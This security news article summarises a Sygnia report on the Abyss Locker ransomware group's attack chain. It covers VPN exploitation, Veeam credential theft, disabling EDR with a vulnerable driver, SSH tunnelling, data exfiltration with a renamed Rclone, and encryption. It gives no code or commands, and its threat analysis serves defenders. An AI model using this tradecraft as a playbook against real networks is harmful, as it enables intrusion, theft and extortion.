Abyss Locker Ransomware: Inside the Stealthy Network Intrusions and Destructive Attacks
Ddos 
Abyss Locker, an emerging ransomware group that surfaced in 2023, has swiftly escalated its cyber onslaught throughout 2024, deploying calculated and devastating attacks against businesses worldwide. A new Sygnia report provides a rare, in-depth analysis of the modus operandi behind Abyss Locker’s attacks, revealing a highly coordinated and evasive ransomware operation designed to cripple organizations by exploiting network vulnerabilities, hijacking credentials, and executing stealthy exfiltration tactics.
Abyss Locker’s attack chain begins with breaching unpatched VPN appliances. Sygnia’s investigation found that the attackers have been exploiting vulnerabilities like CVE-2021-20038 in SonicWall VPN appliances, leveraging these entry points to tunnel deeper into corporate networks.
“By exploiting the VPN appliance, the threat actor gained access to internal network devices and hosts, deploying additional tunneling tools to maintain persistence and facilitate further access,” the report reveals.
Once inside, the attackers pivot to critical network-attached storage (NAS) devices and ESXi servers, ensuring widespread infiltration and lateral movement across the environment.
One of Abyss Locker’s hallmark tactics is targeting backup systems—a move that significantly weakens an organization’s ability to recover from ransomware attacks. The group frequently exploits Veeam backup appliances, executing PowerShell scripts like veeam11.ps1, a modified version of the publicly available Veeam-Get-Creds.ps1 script.
“In one instance, a PowerShell script named ‘veeam11.ps1’, which shared significant code similarities with ‘Veeam-Get-Creds.ps1’, was executed,” Sygnia reported.
Beyond backup systems, the ransomware operators remotely dump Windows Security Account Manager (SAM) and registry hives, stealing local and domain credentials. These compromised accounts allow deep lateral movement across the network.
Abyss Locker employs aggressive anti-detection techniques, systematically disabling security mechanisms on compromised hosts. Sygnia identified multiple techniques used by the group, including:
- Disabling Windows Defender by modifying the registry.
- Removing Endpoint Detection and Response (EDR) agents via Task Manager or SYSTEM-level execution.
- Leveraging Bring Your Own Vulnerable Driver (BYOVD) tactics, such as deploying the UpdateDrv.sys driver to disable security protections.
- Using anti-virus and EDR killer executables, including SophosAV.exe and auSophos.exe, to neutralize endpoint security.
“The ‘UpdateDrv.sys’ driver from Zemana Anti-Logger was observed being used to install a malicious service (‘UpdateSVC’) that disables security controls,” Sygnia notes.
To maintain long-term persistence, Abyss Locker deploys a network of SSH tunnels and SOCKS proxies, often leveraging open-source tools like Chisel and native SSH binaries. These tools allow the attackers to:
- Establish remote access to internal systems.
- Mask malicious activities under legitimate network traffic.
- Pivot through ESXi hosts, VPN appliances, and NAS devices to extend their reach.
Sygnia’s investigation found that the group utilizes a Windows SSH-based backdoor, deployed via a PowerShell script named ‘deploy443.ps1’. This script installs the backdoor under the guise of a legitimate Windows service, WMI Helper Agent, to evade detection.
“The ‘deploy443.ps1’ script created several supporting files, including a configuration XML file defining the C2 server IP address and SSH remote port-forwarding settings,” Sygnia details.
On ESXi servers, the attackers enable SSH daemon (‘sshd’) and execute reverse tunnels back to their Command-and-Control (C2) infrastructure, effectively transforming ESXi appliances into pivot points for further reconnaissance.
Before deploying ransomware, Abyss Locker exfiltrates sensitive corporate data, ensuring leverage for double extortion tactics. The group primarily uses Rclone, a powerful open-source cloud storage utility, renaming its binary to evade detection.
“Consistent with their approach to evasion, the threat actors rename the ‘Rclone’ executable to other names such as ‘ltsvc.exe’ to evade detection,” Sygnia states.
This tool enables targeted data theft, selectively exfiltrating files matching specific extensions and uploading them to Amazon Web Services (AWS) and BackBlaze cloud storage.
After securing complete control over the environment, Abyss Locker launches its final destructive phase—encrypting all accessible data.
- On Windows systems, the ransomware appends the .Abyss extension to encrypted files.
- On ESXi hosts, files are locked using the .crypt extension.
- A ransom note, titled ‘WhatHappened.txt’, is placed across compromised systems.
To further hinder recovery, the attackers execute commands to delete Windows Volume Shadow Copies, effectively wiping out local backups and forcing victims to negotiate ransom payments.
Related Posts:
- Abyss Locker: A Cross-Platform Ransomware Threat
- Stealthy and Persistent: New Ransomware Tactics Target VMware ESXi
- VMware ESXi Vulnerability Exposes Thousands of Servers to Ransomware
About The Author
